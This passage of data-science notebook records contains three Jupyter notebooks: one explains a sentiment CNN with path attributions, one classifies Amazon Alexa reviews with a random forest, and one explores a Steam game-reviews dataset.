] | 145 | 2020-02-10T23:55:17.000Z | 2022-03-25T18:05:57.000Z | examples/natural_language/sentiment_analysis/custom_sentences.ipynb | jumelet/path_explain | c0663522379b4864628962dc43daf78d826e9470 | [
"MIT"
] | 7 | 2020-09-10T11:53:32.000Z | 2021-11-11T17:53:23.000Z | examples/natural_language/sentiment_analysis/custom_sentences.ipynb | jumelet/path_explain | c0663522379b4864628962dc43daf78d826e9470 | [
"MIT"
] | 23 | 2020-02-19T14:18:47.000Z | 2021-12-14T01:57:44.000Z | 262.567527 | 11,704 | 0.92732 | [
[
[
"import sys\nsys.path.append('../transformers/')",
"_____no_output_____"
],
[
"import tensorflow as tf\nimport tensorflow_datasets as tfds\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport pickle\nfrom tqdm import tqdm\n\nfrom path_explain import utils\nfrom plot.text import text_plot, matrix_interaction_plot, bar_interaction_plot\nfrom model import cnn_model\n\nfrom embedding_explainer import EmbeddingExplainerTF",
"_____no_output_____"
],
[
"utils.set_up_environment(visible_devices='3')",
"_____no_output_____"
],
[
"encoder = tfds.features.text.TokenTextEncoder.load_from_file('encoder')",
"_____no_output_____"
],
[
"model = tf.keras.models.load_model('model.h5')",
"_____no_output_____"
],
[
"interpret_model = cnn_model(encoder.vocab_size, for_interpretation=True)",
"_____no_output_____"
],
[
"interpret_model.load_weights('model.h5', by_name=True)",
"_____no_output_____"
],
[
"sentences = [\n 'This movie was bad',\n 'This movie was not bad',\n 'A movie',\n 'A bad movie',\n 'A bad, terrible movie',\n 'A bad, terrible, awful movie',\n 'A bad, terrible, awful, horrible movie'\n]\n\nids_list = []\nfor sentence in sentences:\n ids = encoder.encode(sentence)\n ids = np.array(ids)\n ids = np.pad(ids, pad_width=(0, max(0, 52 - len(ids))))\n ids_list.append(ids)\nids_list = np.stack(ids_list, axis=0)",
"_____no_output_____"
],
[
"model(ids_list)",
"_____no_output_____"
],
[
"embedding_model = tf.keras.models.Model(model.input, model.layers[1].output)",
"_____no_output_____"
],
[
"embeddings = embedding_model(ids_list)",
"_____no_output_____"
],
[
"baseline_embedding = embedding_model(np.zeros((1, 52), dtype=np.float32))",
"_____no_output_____"
],
[
"explainer = EmbeddingExplainerTF(interpret_model)",
"_____no_output_____"
],
[
"attributions = explainer.attributions(inputs=embeddings,\n baseline=baseline_embedding,\n batch_size=128,\n num_samples=256,\n use_expectation=False,\n output_indices=0,\n verbose=True)",
"100%|██████████| 7/7 [00:00<00:00, 16.78it/s]\n"
],
[
"interactions = explainer.interactions(inputs=embeddings,\n baseline=baseline_embedding,\n batch_size=128,\n num_samples=256,\n use_expectation=False,\n output_indices=0,\n verbose=True)",
"100%|██████████| 7/7 [00:17<00:00, 2.43s/it]\n"
],
[
"encoder.decode(ids_list[i]).split(' ')",
"_____no_output_____"
],
[
"i = 1\ntext_plot('this movie was not bad'.split(' '), attributions[i], include_legend=True)\nplt.savefig('movie_not_bad_cnn_text.pdf')",
"_____no_output_____"
],
[
"i = 1\nmatrix_interaction_plot(interactions[i, ids_list[i] != 0][:, :5], encoder.decode(ids_list[i]).split(' '))\nplt.savefig('not_bad_cnn_matrix.pdf')",
"_____no_output_____"
],
[
"plot_all(0)",
"_____no_output_____"
],
[
"plot_all(1)",
"_____no_output_____"
],
[
"plot_all(2)",
"_____no_output_____"
],
[
"plot_all(3)",
"_____no_output_____"
],
[
"plot_all(4)",
"_____no_output_____"
],
[
"plot_all(5)",
"_____no_output_____"
],
[
"plot_all(6)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb5105d92353618a2e1c60fe4deb0cf2d9073964 | 50,395 | ipynb | Jupyter Notebook | Amazon-Alexa-Review/Sentiment_Analysis_Assessment_Amazon-Alexa-Review_Mayank-Lohani.ipynb | mayanklohani19/ga-learner-dst-repo | 3b3ab5e3ce5775e827cf9e3affdf44a17f51abe0 | [
"MIT"
] | null | null | null | Amazon-Alexa-Review/Sentiment_Analysis_Assessment_Amazon-Alexa-Review_Mayank-Lohani.ipynb | mayanklohani19/ga-learner-dst-repo | 3b3ab5e3ce5775e827cf9e3affdf44a17f51abe0 | [
"MIT"
] | null | null | null | Amazon-Alexa-Review/Sentiment_Analysis_Assessment_Amazon-Alexa-Review_Mayank-Lohani.ipynb | mayanklohani19/ga-learner-dst-repo | 3b3ab5e3ce5775e827cf9e3affdf44a17f51abe0 | [
"MIT"
] | null | null | null | 100.79 | 24,696 | 0.831531 | [
[
[
"# import packages\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport re\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import PorterStemmer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, f1_score\nfrom imblearn.over_sampling import SMOTE\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n",
"_____no_output_____"
]
],
[
[
"### Load the dataset\n\n- Load the train data and using all your knowledge try to explore the different statistical properties of the dataset.",
"_____no_output_____"
]
],
[
[
"# Code starts here\n\n# load data\ndf = pd.read_csv(\"train.csv\")\n\n# Converting date attribute from string to datetime.date datatype \ndf['date'] = pd.to_datetime(df['date'])\n\n# # calculate the total length of word\ndf['length'] = df['verified_reviews'].apply(len)\n\ndf.head()\n# # Code ends here",
"_____no_output_____"
]
],
[
[
"### Visualize and Preprocess the data\n\n- Visualize the different features of your interest\n- Retaining only alphabets (Using regular expressions)\n- Removing stopwords (Using nltk library)",
"_____no_output_____"
]
],
[
[
"## Rating vs feedback\n\n# set figure size\nplt.figure(figsize=(15,7))\n\n# generate countplot\nsns.countplot(x=\"rating\", hue=\"feedback\", data=df)\n\n# display plot\nplt.show()\n\n\n## Product rating vs feedback\n\n# set figure size\nplt.figure(figsize=(15,7))\n\n# generate barplot\nsns.barplot(x=\"rating\", y=\"variation\", hue=\"feedback\", data=df, ci = None)\n\n# display plot\nplt.show()",
"_____no_output_____"
],
[
"# import packages\nimport re\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import PorterStemmer\n\n# declare empty list 'corpus'\ncorpus=[]\n\n# for loop to fill in corpus\nfor i in range(0,2520):\n # retain alphabets\n review = re.sub('[^a-zA-Z]', ' ', df['verified_reviews'][i] )\n # convert to lower case\n review=review.lower()\n # tokenize\n review=review.split()\n # initialize stemmer object\n ps=PorterStemmer()\n # perform stemming\n review=[ps.stem(word) for word in review if not word in set(stopwords.words('english'))]\n # join elements of list\n review=' '.join(review)\n # add to 'corpus'\n corpus.append(review)\n ",
"_____no_output_____"
]
],
[
[
"### Model building\n\n- Now let's come to the actual task, using any classifier, predict the `feedback`. Use different techniques you have learned to imporove the performance of the model.\n- Try improving upon the `accuracy_score` ([Precision Score](https://scikit-learn.org/stable/modules/generated/sklearn.metrics.precision_score.html))",
"_____no_output_____"
]
],
[
[
"# import libraries\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split\n\n# Instantiate count vectorizer\ncv = CountVectorizer(max_features=1500)\n\n# Independent variable\nX = cv.fit_transform(corpus).toarray()\n\n# dependent variable\ny = df['feedback']\n\n# Counts\ncount = y.value_counts()\nprint(count)\n\n# Split the dataset\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 0)",
"1 2308\n0 212\nName: feedback, dtype: int64\n"
],
[
"# import packages\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, f1_score\n\n# Instantiate calssifier\nrf = RandomForestClassifier(random_state=2)\n\n# fit model on training data\nrf.fit(X_train, y_train)\n\n# predict on test data\ny_pred = rf.predict(X_test)\n\n# calculate the accuracy score\nscore = accuracy_score(y_test, y_pred)\n\n# calculate the precision\nprecision = precision_score(y_test, y_pred)\n\n# display 'score' and 'precision'\nprint(score, precision)",
"0.9305555555555556 0.9363449691991786\n"
],
[
"# import packages\nfrom imblearn.over_sampling import SMOTE\n\n# Instantiate smote\nsmote = SMOTE(random_state=9)\n\n# fit_sample onm training data\nX_train, y_train = smote.fit_sample(X_train, y_train)\n\n# fit modelk on training data\nrf.fit(X_train, y_train)\n\n# predict on test data\ny_pred = rf.predict(X_test)\n\n# calculate the accuracy score\nscore = accuracy_score(y_test, y_pred)\n\n# calculate the precision\nprecision = precision_score(y_test, y_pred)\n\n# display precision and score\nprint(score, precision)",
"0.8888888888888888 0.9449339207048458\n"
]
],
[
[
"### Prediction on the test data and creating the sample submission file.\n\n- Load the test data and store the `Id` column in a separate variable.\n- Perform the same operations on the test data that you have performed on the train data.\n- Create the submission file as a `csv` file consisting of the `Id` column from the test data and your prediction as the second column.",
"_____no_output_____"
]
],
[
[
"# Code Starts here\n# Prediction on test data\n\n# Read the test data\ntest = pd.read_csv('test.csv')\n\n# Storing the id from the test file\nid_ = test['Id']\n\n# Apply the transformations on test\n# Converting date attribute from string to datetime.date datatype \ntest['date'] = pd.to_datetime(test['date'])\n\n# calculate the total length of word\ntest['length'] = test['verified_reviews'].apply(len)\n\n# declare empty list 'corpus'\ncorpus=[]\n\n# for loop to fill in corpus\nfor i in range(0,630):\n # retain alphabets\n review = re.sub('[^a-zA-Z]', ' ', test['verified_reviews'][i] )\n # convert to lower case\n review=review.lower()\n # tokenize\n review=review.split()\n # initialize stemmer object\n ps=PorterStemmer()\n # perform stemming\n review=[ps.stem(word) for word in review if not word in set(stopwords.words('english'))]\n # join elements of list\n review=' '.join(review)\n # add to 'corpus'\n corpus.append(review)\n \ntest = cv.transform(corpus).toarray()\n\n# predict on test data\ny_pred_test = rf.predict(test)\n\ny_pred_test = y_pred_test.flatten()\n\n# Create a sample submission file\nsample_submission = pd.DataFrame({'Id':id_,'feedback':y_pred_test})\nprint(sample_submission.head())\n\n# Convert the sample submission file into a csv file\nsample_submission.to_csv('sample_submission_test.csv',index=False)\n\n# Code ends here",
" Id feedback\n0 2887 1\n1 1934 1\n2 142 1\n3 1072 1\n4 2258 1\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb51081df4c2740c5aee626da09f61c33f8e64b6 | 893,783 | ipynb | Jupyter Notebook | main.ipynb | michele1783/ADM-HW2 | 2635ff78b9b2afa6f5c733a3c48ba5c2c909f681 | [
"MIT"
] | null | null | null | main.ipynb | michele1783/ADM-HW2 | 2635ff78b9b2afa6f5c733a3c48ba5c2c909f681 | [
"MIT"
] | null | null | null | main.ipynb | michele1783/ADM-HW2 | 2635ff78b9b2afa6f5c733a3c48ba5c2c909f681 | [
"MIT"
] | null | null | null | 266.086038 | 219,005 | 0.847246 | [
[
[
"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport seaborn as sns\nfrom datetime import datetime\nfrom functools import reduce\nfrom collections import Counter\nimport functions\nfrom scipy.stats import ks_2samp\nfrom scipy.stats import pearsonr\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\n\npd.options.mode.chained_assignment = None",
"_____no_output_____"
]
],
[
[
"# Load the dataset\nwe load our dataset and using the function **parsedate** we have changed the format of our timestamp",
"_____no_output_____"
]
],
[
[
"dataset = pd.read_csv('steam_reviews.csv',\n index_col=0,\n parse_dates=['timestamp_created', 'timestamp_updated', 'author.last_played'],\n date_parser=functions.parsedate)",
"C:\\Users\\Clara\\AppData\\Local\\Programs\\Python\\Python39\\lib\\site-packages\\numpy\\lib\\arraysetops.py:580: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison\n mask |= (ar1 == a)\n"
],
[
"dataset.head(20)",
"_____no_output_____"
],
[
"dataset.columns",
"_____no_output_____"
],
[
"dataset.shape",
"_____no_output_____"
],
[
"dataset.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 21747371 entries, 0 to 21747375\nData columns (total 22 columns):\n # Column Dtype \n--- ------ ----- \n 0 app_id int64 \n 1 app_name object \n 2 review_id int64 \n 3 language object \n 4 review object \n 5 timestamp_created datetime64[ns]\n 6 timestamp_updated datetime64[ns]\n 7 recommended bool \n 8 votes_helpful int64 \n 9 votes_funny int64 \n 10 weighted_vote_score float64 \n 11 comment_count int64 \n 12 steam_purchase bool \n 13 received_for_free bool \n 14 written_during_early_access bool \n 15 author.steamid int64 \n 16 author.num_games_owned int64 \n 17 author.num_reviews int64 \n 18 author.playtime_forever float64 \n 19 author.playtime_last_two_weeks float64 \n 20 author.playtime_at_review float64 \n 21 author.last_played datetime64[ns]\ndtypes: bool(4), datetime64[ns](3), float64(4), int64(8), object(3)\nmemory usage: 3.2+ GB\n"
]
],
[
[
"# RQ1",
"_____no_output_____"
],
[
"### Exploratory Data Analysis (EDA)\n\nTo try to better understand our dataset we have made a bunch of plots and tables in which we have tried to catch some information about these reviews received for the applications in Steam.",
"_____no_output_____"
]
],
[
[
"dataset.describe()",
"_____no_output_____"
]
],
[
[
"#### Application more reviewed: \nTo start our analysis we have made a pie chart about applications more reviewed. In particular we have decided to pick the first thirty games more reviewed and understand how the number of rewiews is splitted between them. Indeed the percentage written in the slices of the pie plot is referred not to the total number of reviews but the to the sum of reviews written for these thirty more popular games. The choice of thirty is due to make cleaner the plot and because we are interested only in the more popular games. The most talked-about.",
"_____no_output_____"
]
],
[
[
"a = pd.Series(dataset.groupby(\"app_name\").app_id.count().sort_values(ascending=False).head(30))\nplt.rcParams['figure.figsize'] = (10, 10)\nplt.pie(a,\n labels = a.index,\n explode = [0.1 for value in range(0, a.index.nunique())],\n shadow = True, autopct = '%.1f%%')\nplt.title('Application name', fontsize = 20)\nplt.axis('off')\nplt.show()",
"_____no_output_____"
]
],
[
[
"#### Correlation matrix:\nThen we have tried to make a correlation matrix to understand if there are some variables correlated between them ",
"_____no_output_____"
]
],
[
[
"fig, ax = plt.subplots(figsize=(13,13)) \nsns.heatmap(dataset.corr(), cbar=True, annot = True, cmap='BrBG', linewidths=.3,fmt='.1g')",
"_____no_output_____"
]
],
[
[
"We have noticed that there was not any particular correlation between columns except for the ones related to time played by the player therefore we have decided to see in depth these correlations to have clearer information about them. ",
"_____no_output_____"
]
],
[
[
"df = pd.DataFrame(dataset,columns=['author.playtime_forever','author.playtime_last_two_weeks',\\\n 'author.playtime_at_review'])\ncorrMatrix = df.corr()\nsns.heatmap(corrMatrix, annot=True)\nplt.show()\n",
"_____no_output_____"
]
],
[
[
"#### Time and Language:\nAt this point we want to extract some information about the language of the reviews and time when they were written. We have divided the day in three parts: morning (8am-2pm), afternoon (2pm-10pm) and night (10pm-8am). \nSo for each part of the day we have grouped the reviews by language, counted them and picked the ten languages more popular.\n\nIn this way in our final barplot for each popular language we have the number of reviews written in each part of the day. We have also made a table to explain better the number obtained. ",
"_____no_output_____"
]
],
[
[
"arr_1 = dataset['timestamp_created'].dt.time",
"_____no_output_____"
],
[
"time_1 = [datetime.strptime('08:00:00', '%H:%M:%S').time(),\n datetime.strptime('13:59:59', '%H:%M:%S').time()]\nindex_1 = [x for x in arr_1.index if (time_1[0] <= arr_1[x] <= time_1[1])]",
"_____no_output_____"
],
[
"time_2 = [datetime.strptime('14:00:00', '%H:%M:%S').time(),\n datetime.strptime('21:59:59', '%H:%M:%S').time()]\nindex_2 = [x for x in arr_1.index if (time_2[0] <= arr_1[x] <= time_2[1])]",
"_____no_output_____"
],
[
"time_3 = [datetime.strptime('22:00:00', '%H:%M:%S').time(),\n datetime.strptime('23:59:59', '%H:%M:%S').time(),\n datetime.strptime('00:00:00', '%H:%M:%S').time(),\n datetime.strptime('07:59:59', '%H:%M:%S').time()]\nindex_3 = [x for x in arr_1.index\n if ((time_3[0] <= arr_1[x] <= time_3[1]) or\n (time_3[2] <= arr_1[x] <= time_3[3]))]",
"_____no_output_____"
],
[
"# counting occurrences in the languages\nmat1 = Counter((dataset['language'][index_1]).tolist())\npom1 = Counter((dataset['language'][index_2]).tolist())\nnot1 = Counter((dataset['language'][index_3]).tolist())",
"_____no_output_____"
],
[
"# sorting the occurrences\nmat2 = {k: v for k, v in sorted(mat1.items(), key=lambda item: item[1], reverse=True)}\npom2 = {k: v for k, v in sorted(pom1.items(), key=lambda item: item[1], reverse=True)}\nnot2 = {k: v for k, v in sorted(not1.items(), key=lambda item: item[1], reverse=True)}",
"_____no_output_____"
],
[
"# taking only the first 10 languages, that happens to be the same for every time slot\nmattina = list(mat2.items())[:10]\npomeriggio = list(pom2.items())[:10]\nnotte = list(not2.items())[:10]",
"_____no_output_____"
],
[
"# creating an empty dataframe with timeslots as cols and languages as indexes\ndf = pd.DataFrame(index=list(mat2.keys())[:10], columns=['8am-2pm', '2pm-10pm', '10pm-8am'])",
"_____no_output_____"
],
[
"# adding the values in the dataframe\nfor (couple1, couple2, couple3) in zip(mattina, pomeriggio, notte):\n df['8am-2pm'][couple1[0]] = couple1[1]\n df['2pm-10pm'][couple2[0]] = couple2[1]\n df['10pm-8am'][couple3[0]] = couple3[1]",
"_____no_output_____"
],
[
"df.index.name = 'language'\ndf",
"_____no_output_____"
],
[
"ax = df.plot(y=[\"8am-2pm\", \"2pm-10pm\", \"10pm-8am\"], kind=\"bar\")\nax.set_yscale('log')\nax.set_xlabel('languages')\nax.set_ylabel(\"number reviews\")",
"_____no_output_____"
]
],
[
[
"In this stacked barplot we can see that the majority of the reviews are written during the afternoon while during the night fewer people usually write on Steam. The language more used as expected is English",
"_____no_output_____"
],
[
"#### Viral Comments:\nIn this table we have wanted to look at the ten reviews which have received more comments because we have thought that it could be interesting look at them to understand which comments are popular on Steam. ",
"_____no_output_____"
]
],
[
[
"dataset_7 = dataset.sort_values(by=['comment_count'], ascending = False)\ndataset_7 = dataset_7.reset_index()",
"_____no_output_____"
],
[
"dataset_7[[\"author.steamid\", \"language\", \"app_name\", \"review\", \"comment_count\"]].head(10)",
"_____no_output_____"
]
],
[
[
"Unfortunately the majority of them are written not in english!",
"_____no_output_____"
],
[
"#### Games more played:\nIn our dataset there is a column in which is stored the time played by that player to that particular game. So we have decided to explore what are the games more played in terms of hours. We have decided to pick the top 20 games because we have thought that 20 is a good trade-off between a clear plot and a meaningful number of games. ",
"_____no_output_____"
]
],
[
[
"#dataset_8 = dataset_8[[\"author.steamid\", \"author.playtime_forever\",\"app_name\"]]\ndataset_8 = pd.Series(dataset.groupby(\"app_name\")[\"author.playtime_forever\"].sum().sort_values(ascending=False))\nore_di_gioco = dataset_8.values\ngiochi = dataset_8.index",
"_____no_output_____"
],
[
"plt.figure(figsize = ((15, 8)))\nsns.barplot(x = ore_di_gioco[:20], \n y = giochi[:20], orient = 'h')\nplt.title('TOP 20 games more played in terms of hours', size = 20)\nplt.ylabel('Games', size = 14, style = 'italic')\nplt.xlabel('Number of hours', size = 14, style = 'italic')\n#plt.xscale('log')\nplt.xticks(np.arange(1000000000,60000000000,2000000000)) \nplt.show()",
"_____no_output_____"
]
],
[
[
"In this barplot we have found some confirms: the games more played are also often the games more reviewed that were appeared in the pie chart.",
"_____no_output_____"
],
[
"#### Active players:\nTo conclude this first analysis we have tried to understand what are the players more useful for Steam: we have selected the ten authors that have written the most number of helpful and funny reviews. ",
"_____no_output_____"
]
],
[
[
"dataset_9 = pd.Series(dataset[(dataset.votes_helpful > 0)].groupby(\"author.steamid\").votes_helpful.count().sort_values(ascending=False))\n\ndataset_10 = pd.Series(dataset[(dataset.votes_funny > 0)].groupby(\"author.steamid\").votes_funny.count().sort_values(ascending=False))",
"_____no_output_____"
],
[
"pd.concat([dataset_9[:11], dataset_10[:11]], axis=1).reset_index().fillna(0).sort_values(by=['votes_helpful'],ascending=False).reset_index(drop = True)",
"_____no_output_____"
]
],
[
[
"It's interesting to see that the authors who have written some funny reviews have also written helpful reviews. ",
"_____no_output_____"
],
[
"#### Languages and subplots",
"_____no_output_____"
]
],
[
[
"print(\"The total number of languages used to write reviews is \",'\\033[1m' +str(len(dataset[\"language\"].unique())) +'\\033[0m')",
"The total number of languages used to write reviews is \u001b[1m28\u001b[0m\n"
]
],
[
[
"Making a subplot we have been able to visualize all the present languages in the dataset and counting the number of reviews. The two subplots have different measure in y-scales!",
"_____no_output_____"
]
],
[
[
"fig=plt.figure(figsize=(25,18))\nax1=fig.add_subplot(2,1,1)\ndataset['language'].value_counts().head(10).plot.bar(figsize = (18, 10),title='Top 10 Languages',xlabel='Language',ylabel='Number of Reviews', ax = ax1,rot=0, logy = True, color = \"orange\")\nax2=fig.add_subplot(2,1,2)\ndataset['language'].value_counts().iloc[-18:].plot.bar(figsize = (18, 10),title='Other 18 Languages',xlabel='Language',ylabel='Number of Reviews', ax = ax2,rot=0, color = \"orchid\")\nfig.tight_layout();\n\n#dataset['language'].value_counts().plot.bar(figsize = (18, 7),title='Top Languages',xlabel='Language',ylabel='Number of Reviews', ax = ax1)",
"_____no_output_____"
]
],
[
[
"# RQ2",
"_____no_output_____"
],
[
"### Plot the number of reviews for each application in descending order.",
"_____no_output_____"
],
[
"We have decided to make a barplot in which we have counted the number of reviews for the first 50 applications. We have decided 50 because it have seemed to us a good tradeoff to have a clean representation a pick the more reviewed games",
"_____no_output_____"
]
],
[
[
"number_review = dataset.groupby(\"app_name\").review_id.count().sort_values(ascending=False)\nnumber_review[0:50].plot.bar(figsize = (18, 7), title=' Number of review', xlabel='Name of application',\nylabel='Number of review', color = \"coral\", logy = True)\nplt.show()\n",
"_____no_output_____"
],
[
"# for a visual table to have an idea of how many reviews for the first 50 apps\nnumber_review.reset_index().head(50)",
"_____no_output_____"
]
],
[
[
"### What applications have the best Weighted Vote Score?",
"_____no_output_____"
],
[
"Each review has a **Weighted Vote Score** that represents the helpfuness score of that review. To extract the weighted vote score for each game we have computed the mean between all the vote for each application. In this way we have an idea about what applications have received the most helpfulness reviews. Then we have decided to select only average votes above 0.3 because we have considered it a good threshold for the best votes. ",
"_____no_output_____"
]
],
[
[
"medie = pd.DataFrame(dataset.groupby(\"app_name\").weighted_vote_score.mean().sort_values(ascending=False))\nmedie = medie[medie.values > 0.3]\nmedie",
"_____no_output_____"
]
],
[
[
"### Which applications have the most and the least recommendations",
"_____no_output_____"
],
[
"In this point, we thought that for most and least recommended apps, the percentage values where the ones to be aware of, meaning that an app was the most recommended if it has the higher percentage value of the most recommended reviews",
"_____no_output_____"
]
],
[
[
"#Most\n# recommended. group_by app_name. count all recommended,\n# count True recommended and False recommended in separate cols, and percentage of these.\n# taking only the useful cols\nnew_data = dataset[['app_name', 'recommended']]\n# count_rec col counts all recommended respectively False and True of an application\nnew_data['count_rec'] = new_data.groupby(['app_name', 'recommended'], sort=False)['recommended'].transform('count')",
"_____no_output_____"
],
[
"# all_rec col counts all recommedations, False and True together\nnew_data['all_rec'] = new_data.groupby(\"app_name\", sort=False)['count_rec'].transform('count')",
"_____no_output_____"
],
[
"# final dataframe which contains only the True recommendations\n# this means that we can calculate the most and the least recommended apps\nfinal = new_data[(new_data['recommended']==True)].drop_duplicates()",
"_____no_output_____"
],
[
"# perc_rec calculates the percentage recommendation\nfinal['perc_rec'] = (final['count_rec']/final['all_rec'])*100\n# drop not useful cols\nfinal.drop(['recommended', 'count_rec'], axis=1, inplace=True)",
"_____no_output_____"
],
[
"# most recommended, first 50\nfinal.sort_values(by='perc_rec', ascending=False).reset_index(drop=True).head(50)",
"_____no_output_____"
]
],
[
[
"We can see that the most recommended apps are not the one with the higher reviews",
"_____no_output_____"
]
],
[
[
"# least recommended, first 50\nfinal.sort_values(by='perc_rec', ascending=True).reset_index(drop=True).head(50)",
"_____no_output_____"
]
],
[
[
"### How many of these applications were purchased, and how many were given for free?",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
],
[
[
"# steam_purchase\n# taking only the useful cols\nnew_data1 = dataset[['app_name', 'steam_purchase']]",
"_____no_output_____"
],
[
"# same modus operandi of counting recommendation\nnew_data1['count_pur'] = new_data1.groupby(['app_name', 'steam_purchase'], sort=False)['steam_purchase'].transform('count')",
"_____no_output_____"
],
[
"# taking only the ones purchased\nfinal1 = new_data1[(new_data1['steam_purchase']==True)].drop_duplicates()",
"_____no_output_____"
],
[
"# drop not useful col\nfinal1.drop(['steam_purchase'], axis=1, inplace=True)",
"_____no_output_____"
],
[
"# received_for_free\n# taking only the useful cols\nnew_data2 = dataset[['app_name', 'received_for_free']]",
"_____no_output_____"
],
[
"# same modus operandi\nnew_data2['count_free'] = new_data2.groupby(['app_name', 'received_for_free'], sort=False)['received_for_free'].transform('count')",
"_____no_output_____"
],
[
"# take only the ones received_for_free\nfinal2 = new_data2[(new_data2['received_for_free']==True)].drop_duplicates()",
"_____no_output_____"
],
[
"# drop not useful col\nfinal2.drop(['received_for_free'], axis=1, inplace=True)",
"_____no_output_____"
],
[
"# now it's time to calculate the final result, by doing a merge of the final dataframes\ndfs = [final, final1, final2]\nfinal_df = reduce(lambda left,right: pd.merge(left,right,on=['app_name'],\n how='outer'), dfs)",
"_____no_output_____"
],
[
"# taking the first 40 apps that are most recommended and displaying how many times were\n# purchased and how many times were received for free\nfinal_df.sort_values(by='perc_rec', ascending=False).head(40)",
"_____no_output_____"
],
[
"# least recommended\nfinal_df.sort_values(by='perc_rec').head(40)",
"_____no_output_____"
]
],
[
[
"# RQ 3",
"_____no_output_____"
],
[
"### What is the most common time that authors review an application? For example, authors usually write a review at 17:44.",
"_____no_output_____"
],
[
"First of all, we take only the `timestamp_created` col and we convert in `string` the time values. Next, with a simple dictionary and a `for` cycle, we count the occurrences of every single time (HH:MM) and at the end we return only the most common time.",
"_____no_output_____"
]
],
[
[
"# first point\n# taking only the timestamp_created col\ntimestamp_col = np.array(dataset[\"timestamp_created\"].dt.time.astype('str'))",
"_____no_output_____"
],
[
"dict_time = {}\nfor time in timestamp_col:\n # taking only hour and minute\n new_time = time[:5]\n if new_time not in list(dict_time.keys()):\n dict_time[new_time] = 1\n else:\n dict_time[new_time] += 1",
"_____no_output_____"
],
[
"# sorting the dictionary in descending order\ndict_time_sorted = {k: v for k, v in sorted(dict_time.items(), key=lambda item: item[1], reverse=True)}",
"_____no_output_____"
],
[
"# returning the most common time (without seconds)\nnext(iter(dict_time_sorted))",
"_____no_output_____"
]
],
[
[
"### Create a function that receives as a parameter a list of time intervals and returns the plot the number of reviews for each of the intervals.\n\nUsing the function **orario** we can extract for a given list of time interval the number of reviews written in each time interval \n",
"_____no_output_____"
],
[
"### Use the function that you created in the previous literal to plot the number of reviews between the following time intervals:",
"_____no_output_____"
]
],
[
[
"intervalli = ['06:00:00', '10:59:59', '11:00:00', '13:59:59', '14:00:00', '16:59:59',\n '17:00:00', '19:59:59', '20:00:00', '23:59:59', '00:00:00', '02:59:59', '03:00:00',\n '05:59:59']",
"_____no_output_____"
],
[
"functions.orario(intervalli)",
"C:\\Users\\Clara\\AppData\\Local\\Programs\\Python\\Python39\\lib\\site-packages\\numpy\\lib\\arraysetops.py:580: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison\n mask |= (ar1 == a)\n"
]
],
[
[
"On the x-axis for each bar is indicated the starting point of the time interval. We have observed that fewer people have written reviews during the night while the majority of people have written their reviews in the first hours of the morning and in the dinner hours",
"_____no_output_____"
],
[
"# RQ4",
"_____no_output_____"
],
[
"### What are the top 3 languages used to review applications?",
"_____no_output_____"
]
],
[
[
"top_languages = pd.DataFrame(dataset.groupby(\"language\").review_id.count().sort_values(ascending=False).head(3))\ntop_languages",
"_____no_output_____"
]
],
[
[
"As expected the majority of the reviews are written in english, chinese and russian!",
"_____no_output_____"
]
],
[
[
"top_languages = list(top_languages.index)\ntop_languages",
"_____no_output_____"
]
],
[
[
"### Create a function that receives as parameters both the name of a data set and a list of languages’ names and returns a data frame filtered only with the reviews written in the provided languages.",
"_____no_output_____"
],
[
"There we have used the function **get_reviews_by_languages** to accomplish a dataframe where there are only reviews written in the top 3 languages",
"_____no_output_____"
]
],
[
[
"dataset_filter = functions.get_reviews_by_languages(dataset, top_languages)",
"_____no_output_____"
]
],
[
[
"### Use the function created in the previous literal to find what percentage of these reviews (associated with the top 3 languages) were voted as funny?",
"_____no_output_____"
],
[
"For this request we have used the new filtered dataset and for each language we have selected the reviews that have received at least one funny vote and then we have computed the ratio between them and all the reviews written in that language.\n\nTo compute this percentage we have used **dataset_filter** that is the new dataframe obtained using the previous function **filtro**",
"_____no_output_____"
]
],
[
[
"numeratore_1 = []\ndenominatore_1 = []\nrapporto_1 = []\nfor i in range(len(top_languages)):\n numeratore_1.append(dataset_filter.loc[(dataset_filter.votes_funny != 0) & (dataset_filter.language == top_languages[i])].votes_funny.count())\n denominatore_1.append(dataset_filter[dataset_filter.language == top_languages[i]].votes_funny.count())\n rapporto_1.append(round((numeratore_1[i]/denominatore_1[i])*100, 2))\n print(\"The percentage of reviews written in \" + '\\033[1m' + top_languages[i] +'\\033[0m' +\n \" that has received at least a funny vote is \" +\n '\\033[1m' + str(rapporto_1[i]) + \"%\" + '\\033[0m')\n",
"The percentage of reviews written in \u001b[1menglish\u001b[0m that has received at least a funny vote is \u001b[1m11.27%\u001b[0m\nThe percentage of reviews written in \u001b[1mschinese\u001b[0m that has received at least a funny vote is \u001b[1m11.82%\u001b[0m\nThe percentage of reviews written in \u001b[1mrussian\u001b[0m that has received at least a funny vote is \u001b[1m16.68%\u001b[0m\n"
]
],
